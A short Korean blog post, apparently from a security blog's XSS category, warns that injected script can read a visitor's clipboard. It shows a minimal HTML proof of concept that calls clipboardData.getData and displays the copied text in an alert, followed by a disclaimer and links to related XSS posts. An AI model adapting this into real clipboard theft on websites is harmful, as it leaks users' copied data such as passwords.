스크립트로 Clipboard의 내용까지 XSS 할수 있네요..
즉 copy+c 로 카피한 내용 부분 까지 악의적인 사용자에게 유출 될수 있다는 얘기죠..--;
예>
<HTML>
<HEAD>
<TITLE> Clipboard XSS </TITLE>
</HEAD>
<BODY>
<script>var memo = clipboardData.getData("Text");
if (memo!=null) {
alert(memo);
}
</script>
</BODY>
</HTML>
악의적인 사용은 사용자 본인에게 책임이 있음을 명시합니다.
금일도 보안 합시다.
'위험한_친구들 > 십자군_XSS' 카테고리의 다른 글
XSS-Harvest / xss-harvest.pl (0) | 2011.08.29 |
---|---|
Adobe RoboHelp 9 DOM Cross Site Scripting (0) | 2011.08.16 |
Mailto: Crash (may crash you) (0) | 2011.08.08 |
XSS BASIC SITE (0) | 2011.08.08 |
XSS를 이용한 키로거 (0) | 2010.10.27 |